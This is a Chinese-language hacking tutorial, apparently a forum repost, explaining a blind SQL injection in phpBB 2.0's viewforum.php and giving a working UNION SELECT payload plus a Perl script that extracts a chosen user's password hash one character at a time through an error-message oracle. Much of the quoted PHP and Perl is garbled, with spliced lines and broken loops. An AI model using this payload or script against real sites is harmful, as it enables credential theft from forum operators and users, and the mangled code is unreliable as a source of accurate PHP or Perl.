php注入實例

php注入實例在網路上很難看到一篇完整的關於php注入的文章和利用程式碼,於是我自已把mysql和php硬啃了幾個星期，下面說說我的休會吧,希望能拋磚引玉! 
相信大家對asp的注入已經是十分熟悉了,而對php的注入比asp要困難,因為php的magic_gpc選項確實讓人頭疼,在註入中不要出現引號,而php大多和mysql結合,而mysql的功能上的缺點,從另外一人角度看確在一定程度上防止了sql njection的攻擊,我在這裡就舉一個實例吧,我以phpbb2.0為例: 
在viewforum.php中有一個變量沒過濾: 
if ( isset($HTTP_GET_VARS{＠
_VARS
($HTTP_POST_VARS} 
else if ( isset($HTTP_GET_VARS['forum'])) 
{ 
for$um_id = $HTTP_Sd;
$forum_id = ' ; 
} 
就是這個forum,而下面直接把它放進了查詢中: 
if ( !empty($forum_id) ) 
{ 
$sql = "SELECT * 
FROM " . FORN. forum_id"; 
if ( !($result = $db->sql_query($sql)) ) 
{ 
message_die(GENERAL_ERROR, 'Could not obtain forums information', ', __LINE__, FILE__); } 
else 
{ 
message_die(GENERAL_MESSAGE, 'Forum_not_exist'); 
} 

如果是asp的話，相信很多人都會注入了.如果這個forum_id的地址不存在的話，就會使論壇回傳Could not obtain forums information的訊息,於是下面的程式碼就不能執行下去了 
// 
// If the query doesn't return any rows this isn't a valid forum. Inform 
// the / 
if ( !($forum_row = $db->sql_fetchrow($result)) ) 
{ 
message_die(GENERAL_MESSAGE, 'Forum_not_exist') 
)
$userdata = session_pagestart($user_ip, $forum_id) /****************************************

關鍵就是打星號的那一行了,這裡是一個函數session_pagestart($user_ip, $thispage_id),這是在session.php中定義的一個函數,由於代碼太 

長，就不全貼出來了,有興趣的可以自已看看，關鍵是這個函數也呼叫了session_begin(),函數呼叫如下session_begin($user_id, $user_ip, 

$thispage_id, TRUE))，同樣是在這個檔案中定義的,其中有下列程式碼 
$sql = "UPDATE " . SESSIONS_TABLE . " 
SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page = 化insion🜆_c5_i_vv5_vs_5_v; '" . $session_id . "' 
AND session_ip = '$user_ip'"; 
if ( !($result = $db->sql_query($sql)) ││ !$db->sql_affectedrows() )
{md [55 uniqid($user_ip)); 

$sql = "INSERT INTO " . SESSIONS_TABLE . " 
(session_id, session_user_id, session_start, session_time, session_ip, session_user_id, session_start, session_time, session_ip, session_ip; ', $user_id, $ current_time, $current_time, '$user_ip', $page_id, $login)"; 
if ( !($result = $db->sql_query($sql)) ) 
{ 
message_die(CRITICAL_ERROR, 'Error session_begin', ', __LINE__, __FILE__, 

$sql); 
} 


在這裡有個session_page在mysql中定義的是個整形數,他的??$page_id,也就是要插入整形就會報錯了,就會出現Error 

creating new session : session_begin的提示,所以要指這$forum_id的值很重要,所以我把它指定為:-1%20union%20select%201,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and %20ord(substring(user_password,1,1))=57,沒有引號吧!雖然指定的是一個不存在的forum_id但他回傳的查詢結果可不一定是為空,這個就是猜user_id為2的用戶的第一位密碼的ascii碼值是是否為57,如果是的話文章中第一段程式碼中的$result可不為空了,於是就執行了ession_pagestart這個有問題的函數，插入的不是整數當然就要出錯了，於是就顯示Error creating new session : session_begin,就表示你猜對了第一位了，其它位類似. 

如果沒有這句出錯訊息的話我想即使注入成功也很難判斷是否已經成功，看來出錯訊息也很有幫助啊.分析就到這裡，下面附上一段測試程式碼，這段程式碼只要稍加修改就能適用於其它類似的猜md5密碼的情況,這裡我用的英文版的返回條件，中文和其它語言的只要改一下返回條件就行了. 

use HTTP::Request::Common; 
use HTTP: :Response; 
use LWP::UserAgent; 
$ua = new LWP::UserAgent; 

print " ***********************n";
print " phpbb viewforum.php expn"; 
print " code by pinkeyesn"; 
print " www.icehack.comn"; 
print " ******************* *****n"; 
print "please enter the weak file's url:n"; 
print "e.g. http://192.168.1.4/phpBB2/viewforum.phpn"; 
$adr=; ($adr); 
print "please enter the user_id that you want to crackn"; 
$u=; 
chomp($u); 
print "work starting,please wait!n"; (48..57); 
@pink=(@pink,97..102); 
for($j=1;$jfor ($i=0;$i$url=$adr."?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where% 

20user_id=$u%20and%20ord(substring(user_password,$pin,1))=$pink[ $i]"; 
$request = HTTP::Request->new('GET', "$url"); 
$response = $ua->request($request); 

if ($response->is_success ) { 
if ($response->content =~ /Error creating new session/) { 
$pwd.=chr($pink[$i]); 
print "$pwdn" 
} i]); 
print "$pwdn"; 
} 
} } 
if ($pwd ne ""){ 
print "successfully,The password is $pwd,good luckn";} 
else{ 
print "bad luck,work failed!n";} 
? 0.6的search.php的問題利用程式只要將上面程式碼稍加修改就行了